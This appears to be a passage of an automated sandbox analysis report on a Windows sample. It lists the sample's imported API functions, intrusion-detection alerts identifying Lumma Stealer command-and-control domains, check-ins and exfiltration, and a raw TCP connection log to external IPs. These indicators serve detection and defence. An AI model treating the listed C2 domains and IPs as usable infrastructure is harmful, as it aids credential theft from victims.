RT_DIALOG | 0x100de4 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0x100f00 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x100f60 | 0x30 | data | English | United States | 0.8958333333333334 |
RT_MANIFEST | 0x100f90 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193 |
DLL | Import |
---|---|
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW |
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW |
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject |
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation |
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW |
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance |
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:28:03.558872+0100 | 2059051 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop) | 1 | 192.168.2.5 | 50381 | 1.1.1.1 | 53 | UDP |
2025-01-10T23:28:03.575154+0100 | 2059041 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop) | 1 | 192.168.2.5 | 61126 | 1.1.1.1 | 53 | UDP |
2025-01-10T23:28:03.585264+0100 | 2059035 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop) | 1 | 192.168.2.5 | 63819 | 1.1.1.1 | 53 | UDP |
2025-01-10T23:28:03.597572+0100 | 2059039 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop) | 1 | 192.168.2.5 | 65405 | 1.1.1.1 | 53 | UDP |
2025-01-10T23:28:03.608592+0100 | 2059057 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop) | 1 | 192.168.2.5 | 56069 | 1.1.1.1 | 53 | UDP |
2025-01-10T23:28:03.619601+0100 | 2059037 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop) | 1 | 192.168.2.5 | 60134 | 1.1.1.1 | 53 | UDP |
2025-01-10T23:28:03.630579+0100 | 2059043 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop) | 1 | 192.168.2.5 | 53020 | 1.1.1.1 | 53 | UDP |
2025-01-10T23:28:03.641209+0100 | 2059049 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop) | 1 | 192.168.2.5 | 59614 | 1.1.1.1 | 53 | UDP |
2025-01-10T23:28:04.312317+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49871 | 104.102.49.254 | 443 | TCP |
2025-01-10T23:28:04.910878+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.5 | 49871 | 104.102.49.254 | 443 | TCP |
2025-01-10T23:28:05.524064+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49882 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:17.133440+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49882 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:17.133440+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49882 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:17.637094+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49962 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:18.111531+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49962 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:18.111531+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49962 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:18.854106+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49970 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:19.339853+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49970 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:19.827278+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49978 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:20.857657+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49985 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:41.782800+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49987 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:42.729942+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49988 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:45.728519+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49989 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:47.789238+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49990 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:48.270897+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49990 | 104.21.32.1 | 443 | TCP |
2025-01-10T23:28:49.140141+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49991 | 185.161.251.21 | 443 | TCP |
2025-01-10T23:28:49.971104+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49992 | 172.67.162.153 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 10, 2025 23:28:03.664024115 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:03.664055109 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:03.664154053 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:03.665327072 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:03.665338993 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:04.312202930 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:04.312316895 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:04.315773010 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:04.315783024 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:04.316175938 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:04.356489897 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:04.365696907 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:04.407339096 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:04.910883904 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:04.910923004 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:04.910953999 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:04.910984039 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:04.911047935 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:04.911083937 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:04.911097050 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:04.911108017 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:04.911108017 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:04.911108017 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:04.911140919 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:05.003017902 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:05.003087044 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:05.003129959 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:05.003206015 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:05.003245115 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:05.003335953 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:05.008492947 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:05.008584976 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:05.013653040 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:05.013715029 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:05.013732910 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:05.013751984 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:05.013796091 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:05.014789104 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:05.014811039 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:05.014834881 CET | 49871 | 443 | 192.168.2.5 | 104.102.49.254 |
Jan 10, 2025 23:28:05.014842033 CET | 443 | 49871 | 104.102.49.254 | 192.168.2.5 |
Jan 10, 2025 23:28:05.030519962 CET | 49882 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:05.030571938 CET | 443 | 49882 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:05.030649900 CET | 49882 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:05.031013966 CET | 49882 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:05.031024933 CET | 443 | 49882 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:05.523895979 CET | 443 | 49882 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:05.524064064 CET | 49882 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:05.553473949 CET | 49882 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:05.553483963 CET | 443 | 49882 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:05.554548979 CET | 443 | 49882 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:05.555649996 CET | 49882 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:05.555924892 CET | 49882 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:05.555974007 CET | 443 | 49882 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:17.133462906 CET | 443 | 49882 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:17.133697987 CET | 443 | 49882 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:17.133749008 CET | 49882 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:17.134212971 CET | 49882 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:17.134232044 CET | 443 | 49882 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:17.134243965 CET | 49882 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:17.134249926 CET | 443 | 49882 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:17.146496058 CET | 49962 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:17.146518946 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:17.146581888 CET | 49962 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:17.147429943 CET | 49962 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:17.147439957 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:17.636930943 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:17.637094021 CET | 49962 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:17.638288021 CET | 49962 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:17.638298035 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:17.638686895 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:17.639842033 CET | 49962 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:17.639859915 CET | 49962 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:17.639914036 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.111560106 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.111618042 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.111654997 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.111695051 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.111732006 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.111768007 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.111816883 CET | 49962 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:18.111820936 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.111841917 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.111854076 CET | 49962 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:18.111875057 CET | 49962 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:18.112217903 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.112433910 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.112485886 CET | 49962 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:18.112494946 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.153371096 CET | 49962 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:18.153383017 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.200265884 CET | 49962 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:18.202972889 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.203057051 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.203090906 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.203190088 CET | 49962 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:18.203202009 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.203227043 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.203241110 CET | 49962 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:18.232708931 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.233091116 CET | 49962 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:18.233170986 CET | 49962 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:18.233189106 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.233201027 CET | 49962 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:18.233205080 CET | 443 | 49962 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.371764898 CET | 49970 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:18.371808052 CET | 443 | 49970 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.371876955 CET | 49970 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:18.372195959 CET | 49970 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:18.372208118 CET | 443 | 49970 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.853816032 CET | 443 | 49970 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.854105949 CET | 49970 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:18.855401039 CET | 49970 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:18.855412960 CET | 443 | 49970 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.856350899 CET | 443 | 49970 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:18.857666016 CET | 49970 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:18.857811928 CET | 49970 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:18.857893944 CET | 443 | 49970 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:19.339925051 CET | 443 | 49970 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:19.340177059 CET | 443 | 49970 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:19.340236902 CET | 49970 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:19.340327024 CET | 49970 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:19.340358973 CET | 443 | 49970 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:19.354871988 CET | 49978 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:19.354911089 CET | 443 | 49978 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:19.354975939 CET | 49978 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:19.355487108 CET | 49978 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:19.355499029 CET | 443 | 49978 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:19.827193022 CET | 443 | 49978 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:19.827277899 CET | 49978 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:19.830943108 CET | 49978 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:19.830964088 CET | 443 | 49978 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:19.831409931 CET | 443 | 49978 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:19.832519054 CET | 49978 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:19.832672119 CET | 49978 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:19.832705021 CET | 443 | 49978 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:19.832762003 CET | 49978 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:19.875341892 CET | 443 | 49978 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:20.328958988 CET | 443 | 49978 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:20.329075098 CET | 443 | 49978 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:20.329299927 CET | 49978 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:20.329387903 CET | 49978 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:20.329430103 CET | 443 | 49978 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:20.380945921 CET | 49985 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:20.380999088 CET | 443 | 49985 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:20.381077051 CET | 49985 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:20.381350040 CET | 49985 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:20.381361961 CET | 443 | 49985 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:20.857319117 CET | 443 | 49985 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:20.857656956 CET | 49985 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:20.858932972 CET | 49985 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:20.858946085 CET | 443 | 49985 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:20.859523058 CET | 443 | 49985 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:20.860586882 CET | 49985 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:20.860702991 CET | 49985 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:20.860737085 CET | 443 | 49985 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:20.860816956 CET | 49985 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:20.860826969 CET | 443 | 49985 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:41.116357088 CET | 443 | 49985 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:41.116615057 CET | 443 | 49985 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:41.116899014 CET | 49985 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:41.117110968 CET | 49985 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:41.117139101 CET | 443 | 49985 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:41.307038069 CET | 49987 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:41.307066917 CET | 443 | 49987 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:41.307178020 CET | 49987 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:41.307480097 CET | 49987 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:41.307495117 CET | 443 | 49987 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:41.782704115 CET | 443 | 49987 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:41.782799959 CET | 49987 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:41.785213947 CET | 49987 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:41.785228014 CET | 443 | 49987 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:41.785444021 CET | 443 | 49987 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:41.794958115 CET | 49987 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:41.795062065 CET | 49987 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:41.795092106 CET | 443 | 49987 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:42.236114979 CET | 443 | 49987 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:42.236191988 CET | 443 | 49987 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:42.236277103 CET | 49987 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:42.236577988 CET | 49987 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:42.236603022 CET | 443 | 49987 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:42.250041962 CET | 49988 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:42.250083923 CET | 443 | 49988 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:42.250159025 CET | 49988 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:42.250420094 CET | 49988 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:42.250436068 CET | 443 | 49988 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:42.729718924 CET | 443 | 49988 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:42.729942083 CET | 49988 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:42.735814095 CET | 49988 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:42.735862017 CET | 443 | 49988 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:42.736242056 CET | 443 | 49988 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:42.740890026 CET | 49988 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:42.740994930 CET | 49988 | 443 | 192.168.2.5 | 104.21.32.1 |
Jan 10, 2025 23:28:42.741010904 CET | 443 | 49988 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:44.904756069 CET | 443 | 49988 | 104.21.32.1 | 192.168.2.5 |
Jan 10, 2025 23:28:44.904876947 CET | 443 | 49988 | 104.21.32.1 | 192.168.2.5 |
